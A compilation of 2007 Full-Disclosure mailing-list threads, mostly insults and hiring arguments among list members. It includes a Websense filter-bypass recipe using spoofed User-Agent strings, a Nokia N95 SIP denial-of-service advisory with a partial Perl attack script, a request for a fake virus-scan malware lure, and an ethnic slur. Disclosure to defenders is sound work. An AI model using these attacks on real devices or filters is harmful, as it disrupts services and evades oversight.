automatic updates with notification? Silent patching? Microsoft tactics? I also knew websense was a joke but now you have come to this? On Dec 13, 2007 8:49 AM, Hubbard, Dan [EMAIL PROTECTED] wrote: An added note on this... Customers do not need to download nor install any new patch for this fix. It was automatically updated and installed with our nightly protocol signature updates. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of The Security Community Sent: Wednesday, December 12, 2007 3:32 PM To: [EMAIL PROTECTED]; Full-Disclosure Subject: [Full-disclosure] Fwd: Websense 6.3.1 Filtering Bypass Mr. HinkyDink would like to share the following with the Security Community... -- Forwarded message -- From: [EMAIL PROTECTED] Date: Dec 12, 2007 6:05 PM Subject: Websense 6.3.1 Filtering Bypass To: [EMAIL PROTECTED] Please share this with your little friends... -- Websense Policy Filtering Bypass discovered by mrhinkydink PRODUCT: Websense Enterprise 6.3.1 EXPOSURE: Web Filtering Bypass SYNOPSIS By spoofing the User-Agent header it is possible to bypass filtering and, to a lesser extent, monitoring in a Websense Enterprise 6.3.1 environment. PROOF OF CONCEPT The following was tested in an unpatched 6.3.1 system using the ISA Server integration product. It is assumed it will work with other integration products but this has not been tested. Other User Agents may also work. I. Install FireFox 2.0.x II. Obtain and install the User Agent Switcher browser plug-in by Chris Pederick III. Add the following User Agents to the plug-in Description: RealPlayer User Agent : RealPlayer G2 Description: MSN Messenger User Agent : MSMSGS Description: WebEx User Agent : StoneHttpAgent IV. Change FireFox's User Agent to any one of the preceding values V. Browse to a filtered Web site VI. Content is allowed Content browsed via this method will be recorded in the Websense database as being in the Non-HTTP category. Demonstration: http://www.youtube.com/watch?v=pKv41ge8XcQ SEE ALSO Websense KnowledgeBase article #976 The vendor acknowledges this behavior in the aforementioned article. WORKAROUND == Disable the protocols mentioned above. VENDOR RESPONSE === Websense has repaired this issue in database #92938 NOTICE == mrhinkydink is not to be confused with the blogger by the same name at www.dailykos.com c. MMVII mrhinkydink ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Protected by Websense Messaging Security ? www.websense.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability
wow thats quite impressive.. you couldnt exploit a basic overflow and two years later someone else did you must be quite proud. Did you tell your family and co workers about this great finding? I hear tipping point and idefense are hiring you should forward them this set of emails. On Dec 12, 2007 2:38 AM, Morning Wood [EMAIL PROTECTED] wrote: One of my first advisories and was rediscovered later, turned into a viable exploit 2 years after by another researcher. http://framework.metasploit.com/exploits/view/?refname=windows:ftp:netterm_netftpd_user http://metasploit.com:5/EXPLOITS?MODE=SELECTMODULE=%6e%65%74%74%65%72%6d%5f%6e%65%74%66%74%70%64%5f%75%73%65%72%5f%6f%76%65%72%66%6c%6f%77 *hugz* - Original Message - From: reepex [EMAIL PROTECTED] To: Morning Wood [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Tuesday, December 11, 2007 1:58 PM Subject: Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability are you serious? http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2003-07/0259.html I guess you are a 'brain dead india wannabe sec researcher' also? On Dec 11, 2007 6:22 AM, Morning Wood [EMAIL PROTECTED] wrote: advisories like this are typical of brain dead India wannabe sec researchers nuff said ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability
are you serious? http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2003-07/0259.html I guess you are a 'brain dead india wannabe sec researcher' also? On Dec 11, 2007 6:22 AM, Morning Wood [EMAIL PROTECTED] wrote: advisories like this are typical of brain dead India wannabe sec researchers nuff said ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] TOP 10 Vulnerability Trends for 2008
is this a serious report or just troll bait? buzz words, charts and graphs, and nothing technical is that you gadi? On Dec 11, 2007 3:48 PM, Sowhat [EMAIL PROTECTED] wrote: It's the last month of 2007 and the time is right to look back at the year and predict the vulnerability trends for 2008. A quick glance at the National Vulnerability Database reveals that there has been a disclosure of 5,877 unique vulnerabilities so far this year. Nevis Labs has been researching these and developing novel solutions to protect its customers. Based on our research and documented information, the following are our predictions for the TOP 10 vulnerability trends in 2008: - ActiveX - File Format - Antivirus - Firewall - IM - Virtualization - VISTA - Driver - VOIP - Mobile For details: http://www.nevisnetworks.com/content/labs/Top10.pdf -- Sowhat http://secway.org Life is like a bug, Do you know how to exploit it ? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] (no subject)
turned down? should i forward the list the emails were you and that random from netragard were begging me to work for you? On Dec 9, 2007 12:17 PM, Simon Smith [EMAIL PROTECTED] wrote: Awww, reepex feels bad because he got turned down... ;] reepex wrote: only simon from snosoft and people from netragard try to hire people from FD ;) apparently they are not too satisfied with their current employees' skills On Dec 9, 2007 12:04 AM, dripping [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: And would you like to join my new CYBERSECURITY FIRM? We post to mailing lists and advertise like we're not actually advertising for ourselves. reepex wrote: I tried responding to your mail but it seems you did not get it so maybe you will on the list yes I would LOVE to your join your crew - could you please email me your silc server and bbs board details? On Dec 3, 2007 8:00 AM, Gobbles is back [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: Would you wish to join our crew ? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- - simon -- http://www.snosoft.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Flash that simulates virus scan
the first email from simon asking about where i work following a succesful troll of some random kiddie On Oct 31, 2007 4:37 PM, Simon Smith [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Reepex, What company are you with? I'm actually interested in finding infosec companies that perform real work as opposed to doing everything automated. Nice to hear that you're a real tester. With respect to your question, doesn't msf3 have some of that functionality already built into it? Have you already hit all their web-apps? reepex wrote: resulting to se in a pen test cuz you cant break any of the actual machines? lulz On 10/31/07, Joshua Tagnore [EMAIL PROTECTED] wrote: List, Some time ago I remember that someone posted a PoC of a small site that had a really nice looking flash animation that performed a virus scan and after the virus scan was finished, the user was prompted for a Download virus fix? question. After that, of course, a file is sent to the user and he got infected with some malware. Right now I'm performing a penetration test, and I would like to target some of the users of the corporate LAN, so I think this approach is the best in order to penetrate to the LAN. I searched google but failed to find the URL, could someone send it to me ? Thanks! Cheers, -- Joshua Tagnore ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ - -- - - simon - -- http://www.snosoft.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.5 (Darwin) iD8DBQFHKQOLf3Elv1PhzXgRAo+EAJwJ0eI/2XkWBxMWalEBNSYkYh+YqQCgh49q XaNATfPu4PAuP8vnVF8/eyw= =yy5T -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Flash that simulates virus scan
my response about a fictional company to keep the game along On Oct 31, 2007 10:03 PM, reepex [EMAIL PROTECTED] wrote: I work at a less known security company that bans use of any automated tools unless under extreme circumstances. These include times such as when have 1000s of ip addresses all alive and running random windows versions so we use mass scans to find any unpatched machines. We strictly do not allow 'web scanners' no matter how large the size because they are all crap and its quicker to find the bugs yourself then verify all the false positives any web app scanner creates. How does your company handle these things? On 10/31/07, Simon Smith [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Reepex, What company are you with? I'm actually interested in finding infosec companies that perform real work as opposed to doing everything automated. Nice to hear that you're a real tester. With respect to your question, doesn't msf3 have some of that functionality already built into it? Have you already hit all their web-apps? reepex wrote: resulting to se in a pen test cuz you cant break any of the actual machines? lulz On 10/31/07, Joshua Tagnore [EMAIL PROTECTED] wrote: List, Some time ago I remember that someone posted a PoC of a small site that had a really nice looking flash animation that performed a virus scan and after the virus scan was finished, the user was prompted for a Download virus fix? question. After that, of course, a file is sent to the user and he got infected with some malware. Right now I'm performing a penetration test, and I would like to target some of the users of the corporate LAN, so I think this approach is the best in order to penetrate to the LAN. I searched google but failed to find the URL, could someone send it to me ? Thanks! Cheers, -- Joshua Tagnore ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ - -- - - simon - -- http://www.snosoft.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.5 (Darwin) iD8DBQFHKQOLf3Elv1PhzXgRAo+EAJwJ0eI/2XkWBxMWalEBNSYkYh+YqQCgh49q XaNATfPu4PAuP8vnVF8/eyw= =yy5T -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Flash that simulates virus scan
the next response where simon describes the shortcomings of his company and his wish to partner with people who actually know security On Nov 1, 2007 10:36 AM, Simon Smith [EMAIL PROTECTED] wrote: I am eagerly awaiting your response to my question. We're looking for companies like yours to partner with because we have a lot of overflow work. Or at least, I think we are, you haven't told me what company yet. reepex wrote: I work at a less known security company that bans use of any automated tools unless under extreme circumstances. These include times such as when have 1000s of ip addresses all alive and running random windows versions so we use mass scans to find any unpatched machines. We strictly do not allow 'web scanners' no matter how large the size because they are all crap and its quicker to find the bugs yourself then verify all the false positives any web app scanner creates. How does your company handle these things? On 10/31/07, Simon Smith [EMAIL PROTECTED] wrote: Reepex, What company are you with? I'm actually interested in finding infosec companies that perform real work as opposed to doing everything automated. Nice to hear that you're a real tester. With respect to your question, doesn't msf3 have some of that functionality already built into it? Have you already hit all their web-apps? reepex wrote: resulting to se in a pen test cuz you cant break any of the actual machines? lulz On 10/31/07, Joshua Tagnore [EMAIL PROTECTED] wrote: List, Some time ago I remember that someone posted a PoC of a small site that had a really nice looking flash animation that performed a virus scan and after the virus scan was finished, the user was prompted for a Download virus fix? question. After that, of course, a file is sent to the user and he got infected with some malware. Right now I'm performing a penetration test, and I would like to target some of the users of the corporate LAN, so I think this approach is the best in order to penetrate to the LAN. I searched google but failed to find the URL, could someone send it to me ? Thanks! Cheers, -- Joshua Tagnore ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- - simon -- http://www.snosoft.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Flash that simulates virus scan
here is adriel from netragard spouting about his lame company that uses nessusd for all their testing... notice his signature has multiple emails and phone numbers because his is incapable of passing his cissp On Nov 1, 2007 9:31 AM, Adriel Desautels [EMAIL PROTECTED] wrote: We rely on manual testing for everything. Our philosophy is that automation is not nearly as effective as human talent. Human talent produces high quality reports. What is the name of your company? Regards, Adriel T. Desautels Chief Technology Officer Netragard, LLC. Office : 617-934-0269 Mobile : 617-633-3821 http://www.linkedin.com/pub/1/118/a45 --- Netragard, LLC - http://www.netragard.com - We make IT Safe Penetration Testing, Vulnerability Assessments, Website Security reepex wrote: I work at a less known security company that bans use of any automated tools unless under extreme circumstances. These include times such as when have 1000s of ip addresses all alive and running random windows versions so we use mass scans to find any unpatched machines. We strictly do not allow 'web scanners' no matter how large the size because they are all crap and its quicker to find the bugs yourself then verify all the false positives any web app scanner creates. How does your company handle these things? On 10/31/07, Simon Smith [EMAIL PROTECTED] wrote: Reepex, What company are you with? I'm actually interested in finding infosec companies that perform real work as opposed to doing everything automated. Nice to hear that you're a real tester. With respect to your question, doesn't msf3 have some of that functionality already built into it? Have you already hit all their web-apps? reepex wrote: resulting to se in a pen test cuz you cant break any of the actual machines? lulz On 10/31/07, Joshua Tagnore [EMAIL PROTECTED] wrote: List, Some time ago I remember that someone posted a PoC of a small site that had a really nice looking flash animation that performed a virus scan and after the virus scan was finished, the user was prompted for a Download virus fix? question. After that, of course, a file is sent to the user and he got infected with some malware. Right now I'm performing a penetration test, and I would like to target some of the users of the corporate LAN, so I think this approach is the best in order to penetrate to the LAN. I searched google but failed to find the URL, could someone send it to me ? Thanks! Cheers, -- Joshua Tagnore ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] on xss and its technical merit
after the last email where they asked for a resume i did not feel like making up a fake resume like i made a fake company so I ignored them... only 3 days later simon sends this email begging me to stay in contact and work him I think snosoft but be in serious trouble if they look to merge with companies and hire employees based on troll posts from FD On Nov 5, 2007 10:59 AM, Simon Smith [EMAIL PROTECTED] wrote: Thought you were interested in contract work? reepex wrote: you see you are arguing how useful xss can be for an attacker, but the point of this argument is 1) how hard is it find xss in applications 2) how hard it is to successfully exploit the vulnerability compared to other vulnerabilities xss is way down on the scale i also believe this is what pdp wanted to argue as he believes xss is on the same scale as other bugs following 1 and 2 On Nov 4, 2007 2:28 PM, [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: reepex wrote: 1) XSS isnt techincal no matter how its used I totally disagree with you.. isn't technical for those who cannot realize how much powerful can be a xss, especially if persistent. 2) people who use xss on pentests/real hacking/anything but phishing are lame and only use it because they cannot write real exploits (non-web) or couldnt find any other web bugs (sql injection, cmd exec,file include, whatever) Imho the pentesting will move day by day closer to web applications flaws testing, since the web applications are self written by webmasters and more exposed to possible bugs. Concerning sql inj or rfi are not more difficult to be discovered.. 3) XSS does not have a place on this list or any other security list and i remember when the idea of making a seperate bugtraq for xss was proposed and i still think it should be done. Dunno about that, even if i agree that all the xss flaws found should not be reported here, they would be too much. 4) if you go into a pentest/audit and all you get out is xss then its a failed pentest and the customer should get a refund. I don't agree with this too for the same reasons as before. 5) publishing xss shows your weakness and that you dont have the ability to find actual bugs ( b/c xss isnt a vuln its crap ) Imho a xss is a vuln as much as the others, since if used smartly could get quite dangerous. Reading a report from zone-h i read that the most effective hacking cause it's the xss.. i don't know if i shall agree with this, but obviously it should make us think about it. bye /nexus ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- - simon -- http://www.snosoft.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] (no subject)
the emails are sent your move On Dec 9, 2007 2:02 PM, Simon Smith [EMAIL PROTECTED] wrote: Forward what ever you want, just make sure to edit it first so that you don't look like a liar ;) dripping wrote: I like how he still hasn't responded. reepex wrote: im going to wait for simon to respond ;P he is really good at making himself look like an idiot On Dec 9, 2007 1:39 PM, dripping [EMAIL PROTECTED] wrote: not that i care if this is on/off the list, do it * 9000. reepex wrote: turned down? should i forward the list the emails were you and that random from netragard were begging me to work for you? On Dec 9, 2007 12:17 PM, Simon Smith [EMAIL PROTECTED] wrote: Awww, reepex feels bad because he got turned down... ;] reepex wrote: only simon from snosoft and people from netragard try to hire people from FD ;) apparently they are not too satisfied with their current employees' skills On Dec 9, 2007 12:04 AM, dripping [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: And would you like to join my new CYBERSECURITY FIRM? We post to mailing lists and advertise like we're not actually advertising for ourselves. reepex wrote: I tried responding to your mail but it seems you did not get it so maybe you will on the list yes I would LOVE to your join your crew - could you please email me your silc server and bbs board details? On Dec 3, 2007 8:00 AM, Gobbles is back [EMAIL PROTECTED] mailto: [EMAIL PROTECTED] wrote: Would you wish to join our crew ? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- - simon -- http://www.snosoft.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- - simon -- http://www.snosoft.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] pcap flow extraction
lol I R cant code computer programs to parse simple formats so i beg on mailing lists to make old cissps feel elite lolololol On Dec 6, 2007 1:35 AM, Ivan . [EMAIL PROTECTED] wrote: Ethereal/wireshark is a no go, as it won't process the file due to size, tcpflow is OK, but a little untidy. SInce I R cannot code computer machine instructions I R incapable of patching tcpflow to make it untidy lololololol I make my MSCE degree three weeks ago and now I Am working on phd lololololol hire me large security companies for I AM master pc haqr ftw lolcopter ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] TCP Port randomization paper
holy shit batman! ~$ grep -i grsec draft-ietf-tsvwg-port-randomization-00.txt ~$ as stated by the last person its very strange you do not mention grsecurity in your Survey of the algorithms in use by some popular implementations Are you a developer of selinux or a close friend/relative/lover? It is well known the the selinux developers are in 'grsec/pax denial' (similar to holocaust denail) and believe that their product, which does protect against any attacks and leaves many holes for the nsa to exploit in chinese networks, is superior to pax even though selinux has easily bypassable stack overflow, kernel vulernablity, and null pointer deference protections. On Dec 7, 2007 4:45 PM, Fernando Gont [EMAIL PROTECTED] wrote: Vladimir, Our draft discusses many port randomization approaches. Some of them were taken from existing implementations (e.g., Algorithm 1 was taken from OpenBSD). However, Algorithm 3 was first described (AFAICT) in Michael Larsen's port randomization paper (the first version of our port randomization paper), which was published in 2004. As a result of that paper, Algorithm 3 was implemented in Linux (I'm not sure if this is the implementation you're referring to). Algorithm 4 (a slightly improved version of Algorithm 3) was first described in an earlier version of our paper, published last year (2006). In any case, the good thing here is that the IETF has taken this draft as a WG item, and thus port randomization will hopefully be recommended for TCP, and even for other transport protocols (scuh as UDP, SCTP, and DCCP), as the document has been accepted by the *tsvwg* rather than any transport-protocol-specific wg. Hopefully, this draft may help to have vendors (those that currently don't) introduce port randomization in their stacks. Kind regards, Fernando On Dec 7, 2007 4:15 AM, Vladimir Vitkov [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Strangely enough this stuff exists for more than 3 years ... Think GRSEC and more specifically Network stack randomization. Well of course bow to IETF for accepting this for draft ... Fernando Gont wrote: Folks, We have published a revision of our port randomization paper. This is the first revision of the document since it was accepted as a working group item of the tsvwg working group of the IETF (Internet Engineering Task Force). Any feedback on the proposed/described algorithms will be welcome. The document is available at: http://www.ietf.org/internet-drafts/draft-ietf-tsvwg-port-randomization-00.txt Additionally, it is available in other fancy formats (PDF and HTML) at: http://www.gont.com.ar/drafts/port-randomization/index.html Thanks, -- Fernando Gont e-mail: [EMAIL PROTECTED] || [EMAIL PROTECTED] PGP Fingerprint: 7809 84F5 322E 45C7 F1C9 3945 96EE A9EF D076 FFF1 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ - -- Regards Vladimir Vitkov www.hoster.bg Marijuana will be legal some day, because the many law students who now smoke pot will someday become congressmen and legalize it in order to protect themselves. -- Lenny Bruce -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHWPMiXwMwnJIV9/cRAouqAJ9QA7beYDnzeApGc+FKQRKxPW0lYwCeMPuZ TjFGVXx3BumCXjlkFmt6V78= =Ci85 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] (no subject)
I tried responding to your mail but it seems you did not get it so maybe you will on the list yes I would LOVE to your join your crew - could you please email me your silc server and bbs board details? On Dec 3, 2007 8:00 AM, Gobbles is back [EMAIL PROTECTED] wrote: Would you wish to join our crew ? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] (no subject)
only simon from snosoft and people from netragard try to hire people from FD ;) apparently they are not too satisfied with their current employees' skills On Dec 9, 2007 12:04 AM, dripping [EMAIL PROTECTED] wrote: And would you like to join my new CYBERSECURITY FIRM? We post to mailing lists and advertise like we're not actually advertising for ourselves. reepex wrote: I tried responding to your mail but it seems you did not get it so maybe you will on the list yes I would LOVE to your join your crew - could you please email me your silc server and bbs board details? On Dec 3, 2007 8:00 AM, Gobbles is back [EMAIL PROTECTED] wrote: Would you wish to join our crew ? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Nokia N95 cellphone remote DoS using the SIP Stack
So almighty Phd what is your thesis exactly?
To me it seems to be 'how to run a fuzzer then write crappy perl scripts
to exploit DoS conditions'
does this properly summarize your phd credentials?
I guess you could tack on 'after writing the crappy scripts, flood mailing
lists with our crap, and get made fun of'
I am sure you will serve the academic community great one day when teach
hacking classes revolving around the latest editions of hacking exposed
On Dec 5, 2007 11:05 AM, Radu State [EMAIL PROTECTED] wrote:
Nokia N95 cellphone remote DoS using the SIP Stack
Severity:
High – Denial of Service
Hardware:
Nokia N95
Firmware:
Tested version: Nokia RM-159 V 12.0.013
Notification:
Vulnerability found: 11 September 2007
Contact Nokia Support: 12 September 2007 / None reply Contact Nokia
Security Support: 19 September 2007 / None reply
Vulnerability Synopsis:
If the device has the SIP Phone client activated, a sequence of SIP
messages turn the device in an inconsistent state where the user is not able
to operate it anymore until it reboots.
The sequence of messages consists in 2 different SIP Dialogs where the
first initiates an INVITE transaction but immediately closes it (in an
anticipated manner). While, the second transaction initiates a normal INVITE
transaction that trigger the vulnerability of the target.
The sequence of messages is illustrated below.
X - INVITE --- Nokiav12
X -- 100 Trying -- Nokiav12
X - CANCEL --- Nokiav12
X - OK (to the Cancel) --- Nokiav12
X 487 Request Terminated Nokiav12
New Dialog
X - INVITE --- Nokiav12
X -- 100 Trying -- Nokiav12
X -- 180 Trying -- Nokiav12
The device does not work properly anymore
Impact:
A remote entity can take down all the services of the cell phone
Resolution:
As we did not get any proper reply from Nokia about the subject, the best
way will be to disable the SIP Client
Credits:
Humberto J. Abdelnur (Ph.D Student)
Radu State (Ph.D)
Olivier Festor (Ph.D)
This vulnerability was identified by the Madynes research team at INRIA
Lorraine, using KiF the Madynes VoIP fuzzer.
http://madynes.loria.fr/
Proof of Concept:
A perl script (nokiav12.pl) is attached to this mail. Before launching
it, the SIP phone has to be initialed in the target device
Command:
perl nokiav12.pl dst_IP username SourceIp SourceUsername
Eg. perl nokiav12.pl 192.168.1.119 lupilu 192.168.1.2 tucu
#!/usr/bin/perl
##
# Vulnerabily discovered using KiF ~ Kiph #
# #
# Authors: #
# Humberto J. Abdelnur (Ph.D Student) #
# Radu State (Ph.D) #
# Olivier Festor (Ph.D) #
# #
# Madynes Team, LORIA - INRIA Lorraine #
# http://madynes.loria.fr #
##
use IO::Socket::INET;
use String::Random;
die Usage $0 targetIP targetUser attackerIP attackerUser
unless ($ARGV[3]);
$targetUser = $ARGV[1];
$targetIP = $ARGV[0];
$attackerUser = $ARGV[3];
$attackerIP= $ARGV[2];
$socket=new IO::Socket::INET-new(
Proto='udp',
PeerPort=5060,
PeerAddr=$targetIP,
LocalPort=5060);
$foo = new String::Random;
$callid= $foo-randpattern(CCccnCn);
$cseq = $foo-randregex('\d\d\d\d');
$sdp = v=0\r
o=Lupilu 63356722367567875 63356722367567875 IN IP4 $attackerIP\r
s=-\r
c=IN IP4 $attackerIP\r
t=0 0\r
m=audio 49152 RTP/AVP 96 0 8 97 18 98 13\r
a=sendrecv\r
a=ptime:20\r
a=maxptime:200\r
a=fmtp:96 mode-change-neighbor=1\r
a=fmtp:18 annexb=no\r
a=fmtp:98 0-15\r
a=rtpmap:96 AMR/8000/1\r
a=rtpmap:0 PCMU/8000/1\r
a=rtpmap:8 PCMA/8000/1\r
a=rtpmap:97 iLBC/8000/1\r
a=rtpmap:18 G729/8000/1\r
a=rtpmap:98 telephone-event/8000/1\r
a=rtpmap:13 CN/8000/1\r
;
$sdplen= length $sdp;
$msg = INVITE sip:[EMAIL PROTECTED] SIP/2.0\r
Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r
From: sip:[EMAIL PROTECTED];tag=1\r
To: sip:[EMAIL PROTECTED]\r
Call-ID: [EMAIL PROTECTED]
CSeq: $cseq INVITE\r
Max-Forwards: 70\r
Contact: sip:[EMAIL PROTECTED]\r
Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY,
MESSAGE\r
Content-Type: application/sdp\r
Content-Length: $sdplen\r
\r
$sdp;
$socket-send($msg);
$text = '';
while (not $text =~ /^SIP\/2.0 100(.\r\n)*/ ){
$socket-recv($text,1024,0);
}
$msg = CANCEL sip:[EMAIL PROTECTED] SIP/2.0\r
Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r
From: sip:[EMAIL PROTECTED];tag=1\r
To: sip:[EMAIL PROTECTED];tag=1\r
Call-ID: [EMAIL PROTECTED]
CSeq: $cseq CANCEL\r
Max-Forwards: 70\r
